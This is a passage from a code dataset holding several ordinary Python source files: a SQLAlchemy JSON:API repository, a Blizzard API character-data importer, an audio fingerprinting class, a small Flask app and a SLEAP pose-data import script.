"usage_type": "attribute"}, {"api_name": "os.system", "line_number": 10, "usage_type": "call"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 27, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": 
"os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 57, "usage_type": "call"}, {"api_name": "moxing.file.copy_parallel", "line_number": 60, "usage_type": "call"}, {"api_name": "moxing.file", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "24488840", "text": "import logging\n\nfrom sqlalchemy import exc\nfrom sqlalchemy.orm import exc as orm_exc\n\nfrom flask_jsonapi import exceptions\nfrom flask_jsonapi.resource_repositories import repositories\nfrom flask_jsonapi.exceptions import ForbiddenError\n\nlogger = logging.getLogger(__name__)\n\n\nclass SqlAlchemyModelRepository(repositories.ResourceRepository):\n model = None\n session = None\n instance_name = 'model instance'\n filter_methods_map = {}\n\n def create(self, data, **kwargs):\n obj = self.build(data)\n self.session.add(obj)\n try:\n self.session.flush()\n return obj\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='{} could not be created.'.format(self.instance_name.capitalize()))\n\n def get_list(self, filters=None):\n try:\n query = self.get_query()\n return self.apply_filters(query, filters).all()\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while getting {} list.'.format(self.instance_name))\n\n def get_detail(self, id):\n try:\n return self.get_query().filter(self.model.id == id).one()\n except orm_exc.NoResultFound:\n raise exceptions.ObjectNotFound(source={'parameter': 'id'},\n detail='{} {} not found.'.format(self.instance_name.capitalize(), id))\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while getting {} details.'.format(self.instance_name))\n\n def delete(self, id):\n obj = self.get_detail(id)\n try:\n self.session.delete(obj)\n self.session.flush()\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while deleting {}.'.format(self.instance_name))\n\n def update(self, data, **kwargs):\n id = data['id']\n obj = self.get_detail(id)\n for key, value in data.items():\n self.update_attribute(obj, key, value)\n try:\n self.session.flush()\n return obj\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while updating {}.'.format(self.instance_name))\n\n def get_query(self):\n return self.model.query\n\n def apply_filters(self, query, filters):\n filters = filters or {}\n for filter, value in filters.items():\n if filter in self.filter_methods_map:\n filter_method = self.filter_methods_map[filter]\n query = query.filter(filter_method(value))\n else:\n query.filter_by(**{filter: value})\n return query\n\n def build(self, kwargs):\n return self.model(**kwargs)\n\n def update_attribute(self, obj, key, new_value):\n setattr(obj, key, new_value)\n", "sub_path": "flask_jsonapi/resource_repositories/sqlalchemy_repositories.py", "file_name": "sqlalchemy_repositories.py", "file_ext": "py", "file_size_in_byte": 3007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": 
"flask_jsonapi.resource_repositories.repositories.ResourceRepository", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask_jsonapi.resource_repositories.repositories", "line_number": 13, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 25, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 33, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.exc.NoResultFound", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.exc", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ObjectNotFound", "line_number": 41, "usage_type": "call"}, {"api_name": "flask_jsonapi.exceptions", "line_number": 41, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 43, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 45, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 52, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 54, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 64, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "564049448", "text": "# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python\n\nimport json\nimport logging\nimport time\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import urlfetch\nfrom google.appengine.api import urlfetch_errors\n\nclass APIKey(ndb.Model):\n key = ndb.StringProperty(indexed=True,required=True)\n\nclass Importer:\n\n def load(self, toonlist, data):\n q = APIKey.query()\n apikey = q.fetch()[0].key\n \n # Request all of the toon data from the blizzard API and determine the\n # group's ilvls, armor type counts and token type counts. subs are not\n # included in the counts, since they're not really part of the main\n # group.\n for toon in toonlist:\n try:\n # TODO: this object can probably be a class instead of another dict\n newdata = dict()\n data.append(newdata)\n\n url = 'https://us.api.battle.net/wow/character/aerie-peak/%s?fields=progression,items&locale=en_US&apikey=%s' % (toon, apikey)\n # create the rpc object for the fetch method. the deadline\n # defaults to 5 seconds, but that seems to be too short for the\n # Blizzard API site sometimes. setting it to 10 helps a little\n # but it makes page loads a little slower.\n rpc = urlfetch.create_rpc(10)\n rpc.callback = self.create_callback(rpc, toon, newdata)\n urlfetch.make_fetch_call(rpc, url)\n newdata['rpc'] = rpc\n newdata['toon'] = toon\n\n # The Blizzard API has a limit of 10 calls per second. 
Sleep here\n # for a very brief time to avoid hitting that limit.\n time.sleep(0.1)\n except:\n logging.error('Failed to create rpc for %s' % toon)\n\n # Now that all of the RPC calls have been created, loop through the data\n # dictionary one more time and wait for each fetch to be completed. Once\n # all of the waits finish, then we have all of the data from the\n # Blizzard API and can loop through all of it and build the page.\n start = time.time()\n for d in data:\n try:\n d['rpc'].wait()\n except:\n logging.error('Waiting for rpc failed')\n end = time.time()\n \n logging.info(\"Time spent retrieving data: %f seconds\" % (end-start))\n\n # Callback that handles the result of the call to the Blizzard API. This will fill in\n # the toondata dict for the requested toon with either data from Battle.net or with an\n # error message to display on the page.\n def handle_result(self, rpc, name, toondata):\n\n try:\n response = rpc.get_result()\n except urlfetch_errors.DeadlineExceededError:\n logging.error('urlfetch threw DeadlineExceededError on toon %s' % name.encode('ascii','ignore'))\n toondata['toon'] = name\n toondata['status'] = 'nok'\n toondata['reason'] = 'Timeout retrieving data from Battle.net for %s. Refresh page to try again.' % name\n return\n except urlfetch_errors.DownloadError:\n logging.error('urlfetch threw DownloadError on toon %s' % name.encode('ascii','ignore'))\n toondata['toon'] = name\n toondata['status'] = 'nok'\n toondata['reason'] = 'Network error retrieving data from Battle.net for toon %s. Refresh page to try again.' % name\n return\n except:\n logging.error('urlfetch threw unknown exception on toon %s' % name.encode('ascii','ignore'))\n toondata['toon'] = name\n toondata['status'] = 'nok'\n toondata['reason'] = 'Unknown error retrieving data from Battle.net for toon %s. Refresh page to try again.' % name\n return\n\n # change the json from the response into a dict of data and store it\n # into the toondata object that was passed in.\n jsondata = json.loads(response.content)\n toondata.update(jsondata);\n\n # Blizzard's API will return an error if it couldn't retrieve the data\n # for some reason. Check for this and log it if it fails. Note that\n # this response doesn't contain the toon's name so it has to be added\n # in afterwards.\n if 'status' in jsondata and jsondata['status'] == 'nok':\n logging.error('Blizzard API failed to find toon %s for reason: %s' %\n (name.encode('ascii','ignore'), jsondata['reason']))\n toondata['toon'] = name\n toondata['reason'] = \"Error retrieving data for %s from Blizzard API: %s\" % (name, jsondata['reason'])\n return\n\n # we get all of the data here, but we want to filter out just the raids\n # we care about so that it's not so much data returned from the importer\n validraids = ['Highmaul','Blackrock Foundry']\n if toondata['progression'] != None:\n toondata['progression']['raids'] = [r for r in toondata['progression']['raids'] if r['name'] in validraids]\n\n del toondata['rpc']\n\n def create_callback(self, rpc, name, toondata):\n return lambda: self.handle_result(rpc, name, toondata)\n\nclass Setup:\n\n # The new Battle.net Mashery API requires an API key when using it. 
This\n # method stores an API key in the datastore so it can be used in later page requests.\n def setkey(self,apikey):\n\n # Delete all of the entities out of the apikey datastore so fresh entities\n # can be loaded.\n q = APIKey.query()\n result = q.fetch();\n if (len(result) == 0):\n k = APIKey(key = apikey)\n k.put()\n else:\n k = result[0]\n k.key = apikey\n k.put()\n", "sub_path": "wowapi.py", "file_name": "wowapi.py", "file_ext": "py", "file_size_in_byte": 5784, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "google.appengine.ext.ndb.Model", "line_number": 13, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 13, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 14, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 14, "usage_type": "name"}, {"api_name": "google.appengine.api.urlfetch.create_rpc", "line_number": 37, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 37, "usage_type": "name"}, {"api_name": "google.appengine.api.urlfetch.make_fetch_call", "line_number": 39, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 39, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 58, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 61, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch_errors.DeadlineExceededError", "line_number": 70, "usage_type": "attribute"}, {"api_name": "google.appengine.api.urlfetch_errors", "line_number": 70, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 71, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch_errors.DownloadError", "line_number": 76, "usage_type": "attribute"}, {"api_name": "google.appengine.api.urlfetch_errors", "line_number": 76, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 83, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 91, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "20701006", "text": "import decoder as decoder\nimport fingerprint\nimport multiprocessing\nimport os\nimport traceback\nimport sys\nimport pandas as pd\nimport numpy as np\nimport itertools \n\n\nclass Dejavu(object):\n\n\tSONG_ID = \"song_id\"\n\tSONG_NAME = 'song_name'\n\tCONFIDENCE = 'confidence'\n\tMATCH_TIME = 'match_time'\n\tOFFSET = 'offset'\n\tOFFSET_SECS = 'offset_seconds'\n\n\tdef __init__(self):\n\t\tsuper(Dejavu, self).__init__()\n\n\t\tif not os.path.isfile('database/fingerprint_table.csv'):\n\t\t\tself.fingerprint_table = pd.DataFrame({'FIELD_HASH':pd.Series([]),\n\t\t\t\t\t 'FIELD_SONG_ID':pd.Series([]),\n\t\t\t\t\t 'FIELD_OFFSET':pd.Series([])})\n\t\telse:\n\t\t\tself.fingerprint_table = pd.read_csv('database/fingerprint_table.csv', encoding='utf-8')\n\n\t\t\t\n\t\tif not os.path.isfile('database/songs_table.csv'):\n\t\t\tself.songs_table = pd.DataFrame({'FIELD_SONGNAME':pd.Series([]),\n\t\t\t\t\t 'FIELD_FILE_SHA1':pd.Series([])})\n\t\telse:\n\t\t\tself.songs_table = 
pd.read_csv('database/songs_table.csv', encoding='utf-8')\n\t\tself.limit = None\n\t\tself.get_fingerprinted_songs()\n\n\tdef _fingerprint_worker(self, filename, limit=None, song_name=None):\n\t\t# Pool.imap sends arguments as tuples so we have to unpack\n\t\t# them ourself.\n\t\t\n\t\tsongname, extension = os.path.splitext(os.path.basename(filename))\n\t\tsong_name = song_name or songname\n\t\tchannels, Fs, file_hash = decoder.read(filename, limit)\n\t\tresult = set()\n\t\tchannel_amount = len(channels)\n\n\t\tfor channeln, channel in enumerate(channels):\n\t\t\t# TODO: Remove prints or change them into optional logging.\n\t\t\tprint(\"Fingerprinting channel %d/%d for %s\" % (channeln + 1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t channel_amount,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t filename))\n\t\t\thashes = fingerprint.fingerprint(channel, Fs=Fs)\n\t\t\tprint(\"Finished channel %d/%d for %s\" % (channeln + 1, \\\n\t\t\t\t\t\t\t\t\t\t\t\tchannel_amount, filename))\n\t\t\tresult |= set(hashes)\n\t\tsid = self.insert_song(song_name, file_hash)\n\t\t# add song data to songs dataframe\n\t\tself.insert_hashes(sid, list(result))\n\t\t# add fingerprints of the song to fingerprints dataframe\n\t\tself.get_fingerprinted_songs()\n\t\tprint('Song added to database')\n\n\tdef fingerprint_directory(self, path, extensions, nprocesses=2):\n\t\t# Try to use the maximum amount of processes if not given.\n\t\tfilenames_to_fingerprint = []\n\t\tfor filename, _ in decoder.find_files(path, extensions):\n\n\t\t\t# don't refingerprint already fingerprinted files\n\t\t\tif decoder.unique_hash(filename) in self.songhashes_set:\n\t\t\t\tprint (\"%s already fingerprinted, continuing...\" % filename)\n\t\t\t\tcontinue\n\n\t\t\tfilenames_to_fingerprint.append(filename)\n\n\t\t# pool = multiprocessing.Pool(nprocesses)\n\t\t# pool.map(self._fingerprint_worker, filenames_to_fingerprint)\n\n\t\tfor filename_to_fingerprint in filenames_to_fingerprint:\n\t\t\tself._fingerprint_worker(filename_to_fingerprint)\n\t\tprint(\"Done with fingerprinting\")\n\t\t\n\tdef find_matches(self, samples, Fs=fingerprint.DEFAULT_FS):\n\t\thashes = fingerprint.fingerprint(samples, Fs=Fs)\n\t\treturn self.return_matches(hashes)\n\n\tdef align_matches(self, matches):\n\t\t\"\"\"\n\t\t\tFinds hash matches that align in time with other matches and finds\n\t\t\tconsensus about which hashes are \"true\" signal from the audio.\n\n\t\t\tReturns a dictionary with match information.\n\t\t\"\"\"\n\t\t# align by diffs\n\t\tdiff_counter = {}\n\t\tlargest = 0\n\t\tlargest_count = 0\n\t\tsong_id = -1\n\n\t\tfor tup in matches:\n\t\t\tsid, diff = tup\n\t\t\tif diff not in diff_counter:\n\t\t\t\tdiff_counter[diff] = {}\n\t\t\tif sid not in diff_counter[diff]:\n\t\t\t\tdiff_counter[diff][sid] = 0\n\t\t\tdiff_counter[diff][sid] += 1\n\n\t\t\tif diff_counter[diff][sid] > largest_count:\n\t\t\t\tlargest = diff\n\t\t\t\tlargest_count = diff_counter[diff][sid]\n\t\t\t\tsong_id = sid\n\t\t\n\t\tmatching_list = []\n\t\tfor key1 in diff_counter.keys():\n\t\t\tfor key2 in diff_counter[key1].keys():\n\t\t\t\tmatching_list.append((diff_counter[key1][key2], key1, key2))\n\t\tmatching_list = list(sorted(matching_list, reverse=True))[:16]\n\n\t\tmatching_df = pd.DataFrame(columns = ['SONG_ID', 'SONG_NAME', 'CONFIDENCE', 'OFFSET', 'OFFSET_SECS', 'FIELD_FILE_SHA1'])\n\t\t# extract idenfication\n\t\tfor count, diff, song_id in matching_list:\n\n\t\t\tsong = self.get_song_by_id(song_id)\t\t\t\n\t\t\tsongname = song[0] if song else None\n\n\t\t\t# return match info\n\t\t\tnseconds = 
round(float(diff) / fingerprint.DEFAULT_FS *\n\t\t\t\t\t\t\t fingerprint.DEFAULT_WINDOW_SIZE *\n\t\t\t\t\t\t\t fingerprint.DEFAULT_OVERLAP_RATIO, 5)\n\t\t\tsong = {\n\t\t\t\t'SONG_ID' : song_id,\n\t\t\t\t'SONG_NAME' : songname,\n\t\t\t\t'CONFIDENCE' : count,\n\t\t\t\t'OFFSET' : int(diff),\n\t\t\t\t'OFFSET_SECS' : nseconds,\n\t\t\t\t'FIELD_FILE_SHA1' : song[1],\n\t\t\t\t\t}\n\t\t\t\n\t\t\tdf = pd.DataFrame([song], columns = song.keys())\n\t\t\tmatching_df = pd.concat([matching_df, df], axis = 0, ignore_index=True).reset_index(drop=True)\n\n\t\t\t# for key in song.keys():\n\t\t\t# \tprint(key, ':', song[key])\n\n\t\tprint(matching_df)\n\n\t\treturn matching_df\n\t\n\tdef recognize(self, recognizer, *options, **kwoptions):\n\t\tr = recognizer(self)\n\t\treturn r.recognize(*options, **kwoptions)\n\n\tdef get_fingerprinted_songs(self):\n\t\t# get songs previously indexed\n\t\tself.songs = self.get_songs()\n\t\tself.songhashes_set = set() # to know which ones we've computed before\n\t\tfor index, song in self.songs.iterrows():\n\t\t\tsong_hash = song['FIELD_FILE_SHA1']\n\t\t\tself.songhashes_set.add(song_hash)\n\n\tdef get_songs(self):\n\t\t\"\"\"\n\t\tReturns all fully fingerprinted songs in the database.\n\t\t\"\"\"\n\t\treturn self.songs_table\n\t\t\n\tdef insert_song(self, song_name, file_hash):\n\t\t\"\"\"\n\t\tInserts a song name into the database, returns the new\n\t\tidentifier of the song.\n\n\t\tsong_name: The name of the song.\n\t\t\"\"\"\n\t\tself.songs_table = self.songs_table.append(pd.DataFrame([[song_name, file_hash \\\n\t\t\t\t\t\t\t\t\t\t]],columns=['FIELD_SONGNAME', \\\n\t\t\t\t\t\t\t\t\t\t\t'FIELD_FILE_SHA1']),\\\n\t\t\t\t\t\t\t\t\t\t\t\tignore_index=True)\n\t\tself.songs_table.to_csv('database/songs_table.csv',encoding='utf-8',index=False)\n\t\treturn (len(self.songs_table)-1)\n\n\tdef insert_hashes(self, sid, hashes):\n\t\t\"\"\"\n\t\tInsert a multitude of fingerprints.\n\n\t\t sid: Song identifier the fingerprints belong to\n\t\thashes: A sequence of tuples in the format (hash, offset)\n\t\t- hash: Part of a sha1 hash, in hexadecimal format\n\t\t- offset: Offset this hash was created from/at.\n\t\t\"\"\"\n\t\tvalues = []\n\t\tfor hash1, offset in hashes:\n\t\t\tvalues.append((hash1, sid, offset))\n\t\thash_table = pd.DataFrame(values,columns=['FIELD_HASH', 'FIELD_SONG_ID', 'FIELD_OFFSET'])\n\t\thash_table.to_csv('database/{}.csv'.format(sid),encoding='utf-8',index=False)\n\t\t# self.fingerprint_table = self.fingerprint_table.append(hash_table,ignore_index=True)\n\n\tdef merge_tables(self):\n\t\t\"\"\"\n\t\tMerge all the CSVs.\n\t\t\"\"\"\n\t\tself.fingerprint_table = pd.read_csv('database/0.csv',encoding='utf-8') \n\t\tfor i in range(1, len(self.songs_table)):\n\t\t\thash_table = pd.read_csv('database/{}.csv'.format(i),encoding='utf-8') \n\t\t\tself.fingerprint_table = self.fingerprint_table.append(hash_table,ignore_index=True)\n\t\tself.fingerprint_table.to_csv('database/fingerprint_table.csv',encoding='utf-8',index=False)\n\n\tdef set_song_fingerprinted(self, sid):\n\t\t\"\"\"\n\t\tSets a specific song as having all fingerprints in the database.\n\n\t\tsid: Song identifier\n\t\t\"\"\"\n\t\tself.songs_table.loc[sid] = list(self.songs_table.loc[sid])[:-1]+[1]\n\t\n\tdef get_song_by_id(self, sid):\n\t\t\"\"\"\n\t\tReturn a song by its identifier\n\n\t\tsid: Song identifier\n\t\t\"\"\"\n\t\treturn list(self.songs_table.loc[sid])\n\t\n\tdef return_matches(self, hashes):\n\t\t\"\"\"\n\t\tSearches the database for pairs of (hash, offset) values.\n\n\t\thashes: A sequence of tuples in the 
format (hash, offset)\n\t\t- hash: Part of a sha1 hash, in hexadecimal format\n\t\t- offset: Offset this hash was created from/at.\n\n\t\tReturns a sequence of (sid, offset_difference) tuples.\n\n\t\t\t\t\t sid: Song identifier\n\t\toffset_difference: (offset - database_offset)\n\t\t\"\"\"\n\t\t# Create a dictionary of hash => offset pairs for later lookups\n\t\tmapper = {}\n\t\tfor hash_val, offset in hashes:\n\t\t\tmapper[hash_val] = offset\n\t\tmatches=[]\n\t\t# Get an iteratable of all the hashes we need\n\t\tvalues = list(mapper.keys())\n\t\t# Create our IN part of the query\n\t\tvalues = pd.DataFrame({'FIELD_HASH':pd.Series(values)})\n\t\tnew = self.fingerprint_table.merge(values, how = 'inner', on = ['FIELD_HASH'])\n\n\t\tfor index, row in new.iterrows():\n\t\t\thash1, sid, offset = row\n\t\t\tmatches.append((sid, offset - mapper[hash1]))\n\t\treturn matches\n\ndef grouper(iterable, n, fillvalue=None):\n\targs = [iter(iterable)] * n\n\treturn (filter(None, values) for values\n\t\t\tin itertools.zip_longest(fillvalue=fillvalue, *args))\n\ndef chunkify(lst, n):\n\t\"\"\"\n\tSplits a list into roughly n equal parts.\n\thttp://stackoverflow.com/questions/2130016/splitting-a\n\t-list-of-arbitrary-size-into-only-roughly-n-equal-parts\n\t\"\"\"\n\treturn [lst[i::n] for i in range(n)]\n", "sub_path": "dejavu.py", "file_name": "dejavu.py", "file_ext": "py", "file_size_in_byte": 8503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.isfile", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 44, "usage_type": "call"}, {"api_name": "decoder.read", "line_number": 46, "usage_type": "call"}, {"api_name": "fingerprint.fingerprint", "line_number": 55, "usage_type": "call"}, {"api_name": "decoder.find_files", "line_number": 69, "usage_type": "call"}, {"api_name": "decoder.unique_hash", "line_number": 72, "usage_type": "call"}, {"api_name": "fingerprint.DEFAULT_FS", "line_number": 85, "usage_type": "attribute"}, {"api_name": "fingerprint.fingerprint", "line_number": 86, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 121, "usage_type": "call"}, {"api_name": "fingerprint.DEFAULT_FS", "line_number": 129, "usage_type": "attribute"}, {"api_name": "fingerprint.DEFAULT_WINDOW_SIZE", "line_number": 130, "usage_type": "attribute"}, {"api_name": "fingerprint.DEFAULT_OVERLAP_RATIO", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", 
"line_number": 141, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 246, "usage_type": "call"}, {"api_name": "itertools.zip_longest", "line_number": 257, "usage_type": "call"}]} +{"seq_id": "109891780", "text": "import socket\nimport time\nfrom flask import Flask\n\napplication = Flask(__name__)\n\n@application.route(\"/\")\ndef hello():\n \n file = open('/mnt/hello-world-storage/logfile','r+')\n file.write(\"access from: \"+socket.gethostname()+\" at: \"+time.ctime())\n \n return \"Hello World! Greetings from \" + socket.gethostname() + \"\\n\" + str(file.readlines()) + \"\\n\"\n\n file.close()\n \nif __name__ == \"__main__\":\n application.run()\n", "sub_path": "wsgi.py", "file_name": "wsgi.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 11, "usage_type": "call"}, {"api_name": "time.ctime", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "586310129", "text": "import h5py\r\nimport pandas as pd\r\nimport json\r\nimport cv2\r\nimport os, glob\r\nfrom pylab import *\r\nimport numpy as np\r\nimport operator\r\nfrom functools import reduce\r\nfrom configparser import ConfigParser, MissingSectionHeaderError, NoOptionError\r\nimport errno\r\nimport simba.rw_dfs\r\n\r\n\r\n#def importSLEAPbottomUP(inifile, dataFolder, currIDList):\r\n\r\ndata_folder = r'Z:\\DeepLabCut\\DLC_extract\\Troubleshooting\\Sleap_h5\\import_folder'\r\n\r\nconfigFile = str(r\"Z:\\DeepLabCut\\DLC_extract\\Troubleshooting\\Sleap_h5\\project_folder\\project_config.ini\")\r\nconfig = ConfigParser()\r\ntry:\r\n config.read(configFile)\r\nexcept MissingSectionHeaderError:\r\n print('ERROR: Not a valid project_config file. 
Please check the project_config.ini path.')\r\nprojectPath = config.get('General settings', 'project_path')\r\nanimalIDs = config.get('Multi animal IDs', 'id_list')\r\ncurrIDList = animalIDs.split(\",\")\r\ncurrIDList = [x.strip(' ') for x in currIDList]\r\nfilesFound = glob.glob(data_folder + '/*.analysis.h5')\r\nvideoFolder = os.path.join(projectPath, 'videos')\r\noutputDfFolder = os.path.join(projectPath, 'csv', 'input_csv')\r\ntry:\r\n wfileType = config.get('General settings', 'workflow_file_type')\r\nexcept NoOptionError:\r\n wfileType = 'csv'\r\nanimalsNo = len(currIDList)\r\nbpNamesCSVPath = os.path.join(projectPath, 'logs', 'measures', 'pose_configs', 'bp_names', 'project_bp_names.csv')\r\nposeEstimationSetting = config.get('create ensemble settings', 'pose_estimation_body_parts')\r\nprint('Converting sleap h5 into dataframes...')\r\ncsvPaths = []\r\n\r\nfor filename in filesFound:\r\n video_save_name = os.path.basename(filename).replace('analysis.h5', wfileType)\r\n savePath = os.path.join(outputDfFolder, video_save_name)\r\n bpNames, orderVarList, OrderedBpList, MultiIndexCol, dfHeader, csvFilesFound, xy_heads, bp_cord_names, bpNameList, projBpNameList = [], [], [], [], [], [], [], [], [], []\r\n print('Processing ' + str(os.path.basename(filename)) + '...')\r\n hf = h5py.File(filename, 'r')\r\n bp_name_list, track_list, = [], [],\r\n for bp in hf.get('node_names'): bp_name_list.append(bp.decode('UTF-8'))\r\n for track in hf.get('track_names'): track_list.append(track.decode('UTF-8'))\r\n track_occupancy = hf.get('track_occupancy')\r\n with track_occupancy.astype('int16'):\r\n track_occupancy = track_occupancy[:]\r\n tracks = hf.get('tracks')\r\n with tracks.astype('int16'):\r\n tracks = tracks[:]\r\n frames = tracks.shape[3]\r\n\r\n animal_df_list = []\r\n for animals in range(len(track_list)):\r\n animal_x_array, animal_y_array = np.transpose(tracks[animals][0]), np.transpose(tracks[animals][1])\r\n animal_p_array = np.zeros(animal_x_array.shape)\r\n animal_array = np.ravel([animal_x_array, animal_y_array, animal_p_array], order=\"F\").reshape(frames, len(bp_name_list) * 3)\r\n animal_df_list.append(pd.DataFrame(animal_array))\r\n video_df = pd.concat(animal_df_list, axis=1)\r\n\r\n for animal in range(len(currIDList)):\r\n for bp in bp_name_list:\r\n colName1, colName2, colName3 = str('Animal_' + str(animal+1) + '_' + bp + '_x'), ('Animal_' + str(animal+1) + '_' + bp + '_y'), ('Animal_' + str(animal+1) + '_' + bp + '_p')\r\n xy_heads.extend((colName1, colName2))\r\n bp_cord_names.append('_' + bp + '_x')\r\n bp_cord_names.append('_' + bp + '_y')\r\n bpNameList.extend((colName1, colName2, colName3))\r\n dfHeader.extend((colName1, colName2, colName3))\r\n if poseEstimationSetting == 'user_defined':\r\n config.set(\"General settings\", \"animal_no\", str(animalsNo))\r\n with open(configFile, \"w+\") as f:\r\n config.write(f)\r\n f.close()\r\n\r\n bpNameListGrouped = [tuple(bpNameList[i:i + 3]) for i in range(0, len(bpNameList), 3)]\r\n\r\n video_df.columns = dfHeader\r\n video_df.fillna(0, inplace=True)\r\n simba.rw_dfs.save_df(video_df, wfileType, savePath)\r\n csvPaths.append(savePath)\r\n print('Saved file ' + savePath + '...')\r\n\r\n\r\n###### ASSIGN IDENTITIES\r\nglobal currIDcounter\r\ndef define_ID(event, x, y, flags, param):\r\n global currIDcounter\r\n if (event == cv2.EVENT_LBUTTONDBLCLK):\r\n centerX, centerY, currID = (int(x), int(y), currIDList[currIDcounter])\r\n ID_user_cords.append([centerX, centerY, currIDList[currIDcounter]])\r\n 